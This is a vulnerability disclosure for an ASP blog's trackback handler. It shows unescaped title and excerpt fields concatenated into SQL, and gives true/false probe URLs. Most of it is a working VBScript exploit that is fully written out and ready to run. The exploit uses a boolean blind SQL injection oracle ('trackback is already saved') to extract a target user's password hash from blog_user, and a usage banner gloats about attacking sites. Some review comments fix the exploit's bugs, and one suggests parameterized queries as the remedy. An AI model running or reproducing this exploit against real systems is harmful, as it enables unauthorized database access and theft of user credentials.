SQL injection in source/src_trackback.asp (function trackbacksave)
// Handles an incoming trackback ping: reads the request fields, runs them
// through the text filters, validates them, then (below) stores the trackback.
// NOTE(review): this listing is truncated after the "Saving trackback" comment;
// the insert statement and the closing brace are not shown here.
Function trackbacksave (){
VaR tbentry = {"log_id": input ["ID"],
"Url": input ["url"],
"Title": input ["title"],
"Excerpt": input ["Excerpt"],
"Blog": input ["blog_name"]
}
// These function calls look really horrible
// Only log_id is coerced (checkint). url/title/excerpt/blog get Trim + wordfilter
// plus checkurl or trimhtml/trimubb -- filters aimed at markup and blocked words.
// Nothing visible here escapes single quotes, so these values are NOT safe to
// concatenate into SQL.
Tbentry. log_id = func. checkint (tbentry. log_id );
Tbentry. url = func. Trim (func. wordfilter (func. checkurl (tbentry. url )));
Tbentry. Title = func. Trim (func. wordfilter (func. trimhtml (func. trimubb (tbentry. Title ))));
Tbentry. Excerpt = func. Trim (func. wordfilter (func. trimhtml (func. trimubb (tbentry. Excerpt ))));
Tbentry. Blog = func. Trim (func. wordfilter (func. trimhtml (func. trimubb (tbentry. Blog ))));
If (tbentry. Title = "") tbentry. Title = tbentry. url;
// Better leave the error messages below in English
// (these fixed messages are exactly what an attacker keys on -- see the oracle below)
If (! Tbentry. log_id)
Trackbackresponse (1, "invalid Article ID ");
If (tbentry. url = "")
Trackbackresponse (1, "source URL is blank ");
// wordfilter apparently yields false when a blocked word is present (see message)
If (tbentry. url = false | tbentry. Title = false | tbentry. Excerpt = false | tbentry. Blog = false)
Trackbackresponse (1, "content contains blocked words ");
// log_id is concatenated unquoted; safe only if checkint really returns an
// integer -- TODO confirm checkint's contract.
VaR tmpa = connblog. Query ("select count (log_id) As I from blog_article where log_locked = false and log_mode <4 and log_id =" + tbentry. log_id );
If (tmpa [0] ["I"] = 0) trackbackresponse (1, "Article does not exist or is locked ");
// SQL INJECTION: title and excerpt are concatenated into single-quoted string
// literals with no escaping. A value like  1111' or '1'='1  breaks out of the
// quotes. Because the request is answered with "trackback is already saved"
// when the count is non-zero and otherwise proceeds, the response is a boolean
// oracle for blind extraction.
// Fix: bind tb_title/tb_excerpt as query parameters (e.g. ADODB.Command
// parameters) or, at minimum, double every single quote before concatenation.
Tmpa = connblog. query ("select count (tb_id) As I from blog_trackback where tb_title = '" + tbentry. title + "'and tb_excerpt ='" + tbentry. excerpt + "'");
If (tmpa [0] ["I"]> 0) trackbackresponse (1, "trackback is already saved ");
// Saving trackback
Note:
Tbentry. log_id = func. checkint (tbentry. log_id );
Tbentry. url = func. Trim (func. wordfilter (func. checkurl (tbentry. url )));
Tbentry. Title = func. Trim (func. wordfilter (func. trimhtml (func. trimubb (tbentry. Title ))));
Tbentry. Excerpt = func. Trim (func. wordfilter (func. trimhtml (func. trimubb (tbentry. Excerpt ))));
Tbentry. Blog = func. Trim (func. wordfilter (func. trimhtml (func. trimubb (tbentry. Blog ))));
log_id is coerced with checkint, but what about url, title and excerpt? They only pass through wordfilter, Trim, trimhtml and trimubb — filters aimed at blocked words and HTML/UBB markup, none of which escapes the single quotes that matter for SQL. These values come straight from
VaR tbentry = {"log_id": input ["ID"],
"Url": input ["url"],
"Title": input ["title"],
"Excerpt": input ["Excerpt"],
"Blog": input ["blog_name"]
}
the raw request `input` collection and are then concatenated into the blog_trackback count query — an obvious SQL injection.
Because the injected value lands inside a single-quoted string literal and the page only reveals a count, this is a string-type (quote-delimited) injection: close the quote, append an OR condition, and compare the page's response for a true and a false condition.
http://127.0.0.1/aspscripts/lbs2.0.311/lbs/trackback.asp?url=1&id=1&blog_name=fffff&excerpt=1111'%20or%20'1'='1
http://127.0.0.1/aspscripts/lbs2.0.311/lbs/trackback.asp?url=1&id=1&blog_name=fffff&excerpt=1111'%20or%20'1'='2
Comparing the two responses shows the effect: with '1'='1' the count is non-zero (provided the target already holds at least one trackback row and article id 1 exists and is not locked) and the page answers "trackback is already saved"; with '1'='2' it does not. That fixed message is the boolean oracle, so a blind-injection exploit follows directly.
'================================================ ============================================
'Usage instructions:
'At the command prompt:
'cscript.exe lbsblog.vbs <blog path on the target site> <user_id of the blog user whose password hash is to be cracked>
'For example:
'Cscript.exe lbsblog. vbs www.xxxx.com/bbs/boke.asp Admin
'(Note: the script appends trackback.asp to the first argument, so pass the blog directory, e.g. www.xxxx.com/bbs/; the second argument is inserted unquoted into "user_id = ...", so it must be the numeric user_id, e.g. 1 — "Admin" as shown would not work as-is.)
'By loveshell
'================================================ ============================================
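' Script entry: parse arguments, build the target URL and run Main.
' NOTE: On Error Resume Next silences every runtime error, including
' XMLHTTP/ADODB failures inside Main; remove it while debugging.
On Error Resume Next
Dim oargs       ' WScript.Arguments
Dim olbsxml     ' XMLHTTP object used to request the target URL
Dim targeturl   ' full URL of trackback.asp on the target
Dim userid      ' numeric user_id whose password hash Main extracts (used unquoted in SQL)
Dim tempstr     ' hex digits of the hash recovered so far
Dim charhex     ' the 16 hexadecimal digits, indexed 0..15 by Main
Set oargs = WScript.Arguments
If oargs.Count <> 2 Then Call showusage()
Set olbsxml = CreateObject("Microsoft.XMLHTTP")
' Normalise the first argument into http://<host>/<path>/trackback.asp
targeturl = oargs(0)
If LCase(Left(targeturl, 7)) <> "http://" Then targeturl = "http://" & targeturl
If Right(targeturl, 1) <> "/" Then targeturl = targeturl & "/"
targeturl = targeturl & "trackback.asp"
userid = oargs(1)
tempstr = ""
' The hash is recovered one hex digit at a time, so the candidate set must hold
' all 16 digits. (The printed listing had lost the digits 0-9, leaving 7 entries
' for a 0..15 loop; the comparison is done by the database and is assumed
' case-insensitive -- TODO confirm for the target DB.)
charhex = Split("0,1,2,3,4,5,6,7,8,9,A,B,C,D,E,F", ",")
WScript.Echo "lbs blog all version exploit [new injection vulnerability]" & vbCrLf
WScript.Echo "by Jianxin" & vbCrLf
WScript.Echo "http://www.loveshell.net /~ _~ I'm really bored... " & vbCrLf
WScript.Echo "+ Fuck the site now" & vbCrLf
' Main reads userid from the global above; its second parameter is unused but
' kept so the Sub's signature is unchanged (the original passed an undeclared name).
Call Main(targeturl, userid)
' Release the XMLHTTP object (the original cleared a never-assigned name, obokexml).
Set olbsxml = Nothing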
'---------------------------------------------- Sub -------------------------------------------------------
'================================================ =====
'Function name: Main
'Purpose: main routine — recovers the blog user's password hash through the blind injection
'================================================ =====
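Sub main(TargetUrl, blogname)
    ' Boolean blind SQL injection against the unescaped excerpt parameter of
    ' trackback.asp. For each position n and candidate digit c the POST asks
    ' "does left(user_password, n) equal <prefix so far> & c?"; the server
    ' answers "trackback is already saved" when the OR'ed condition is true.
    ' TargetUrl - full URL of trackback.asp (built by the top-level code)
    ' blogname  - unused; kept for signature compatibility (userid is a global)
    ' Side effects: up to 40*16 HTTP POSTs; progress is echoed to stdout.
    ' Assumes the target has article id 1 unlocked (the fixed "id=1" below) and
    ' that the hash is 40 hex characters long -- an MD5 would need only 32;
    ' TODO confirm against the target's schema.
    Dim mainoffset, suboffset, getpage, postdata, found
    For mainoffset = 1 To 40
        found = False
        For suboffset = 0 To 15
            ' userid is concatenated unquoted, so it must be the numeric user_id
            postdata = "'or (select left (user_password," & mainoffset & ") from blog_user where user_id =" & userid & ") ='" & tempstr & charhex(suboffset) & "'and '1' = '1"
            olbsxml.Open "Post", TargetUrl, False, "", ""
            olbsxml.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
            ' escape() percent-encodes the quotes and spaces in the payload.
            ' (The printed listing had "url = http://..." with spaces, which would
            ' not populate the url field and trip the "source URL is blank" check.)
            olbsxml.Send "url=http://www.loveshell.net/blog/&id=1&blog_name=loveshell_is_my_hero&excerpt=fuck" & escape(postdata)
            getpage = bytestobstr(olbsxml.responseBody)
            If InStr(getpage, "trackback is already saved") <> 0 Then
                tempstr = tempstr & charhex(suboffset)
                WScript.Echo "+ crack now:" & tempstr & String(40 - mainoffset, "? ")
                found = True
                ' Digit found: stop trying candidates for this position.
                ' (The original had a bare `Exit`, which is not valid VBScript.)
                Exit For
            ElseIf InStr(getpage, "trackback disabled") <> 0 Then
                ' Presumably the target's response when trackbacks are switched off.
                WScript.Echo vbCrLf & "Something error, not vul" & vbCrLf
                WScript.Quit
            End If
        Next
        ' No candidate matched: the hash is shorter than 40 chars or the oracle
        ' stopped answering. Every later position would compare a prefix of the
        ' wrong length and never match, so stop instead of wasting requests.
        If Not found Then
            WScript.Echo vbCrLf & "+ no candidate matched at position " & mainoffset & ", stopping" & vbCrLf
            Exit For
        End If
    Next
    WScript.Echo vbCrLf & "+ We Got it:" & tempstr & vbCrLf & ": P don't be edevil"
End Sub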
'================================================ =====
'Function name: bytestobstr
'Purpose: decode the XMLHTTP response body (a byte array) as gb2312 text.
'================================================ =====
Function bytestobstr(Body)
    ' Decode the raw byte array returned by XMLHTTP.responseBody as gb2312 text.
    ' Body    - binary response body
    ' Returns - the decoded string, obtained via an ADODB.Stream round-trip
    '           (write as binary, rewind, read back as text).
    Dim strm
    Set strm = CreateObject("ADODB.Stream")
    strm.Mode = 3            ' 3 = adModeReadWrite
    strm.Type = 1            ' 1 = adTypeBinary, so Write accepts the byte array
    strm.Open
    strm.Write Body
    strm.Position = 0        ' rewind before switching to text mode
    strm.Type = 2            ' 2 = adTypeText
    strm.Charset = "gb2312"
    bytestobstr = strm.ReadText
    strm.Close
    Set strm = Nothing
End Function
'==================================
'Function name: showusage
'Purpose: print usage and exit.
'==================================
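Sub showusage()
    ' Print usage and exit. Called when the argument count is not exactly 2.
    ' Expected arguments: the blog's base URL (the directory that contains
    ' trackback.asp; "http://" is optional) and the numeric user_id whose
    ' password hash should be recovered.
    WScript.Echo "lbs blog exploit" & vbCrLf & "by loveshell/Jianxin"
    ' The printed listing ran "cscript", the script path and the arguments
    ' together without spaces; separate them so the usage line is readable.
    WScript.Echo "Usage:" & vbCrLf & "cscript " & WScript.ScriptFullName & " TargetUrl userid"
    WScript.Echo "Example:" & vbCrLf & "cscript " & WScript.ScriptFullName & " http://www.loveshell.net/ 1"
    WScript.Echo ""
    WScript.Quit
End Sub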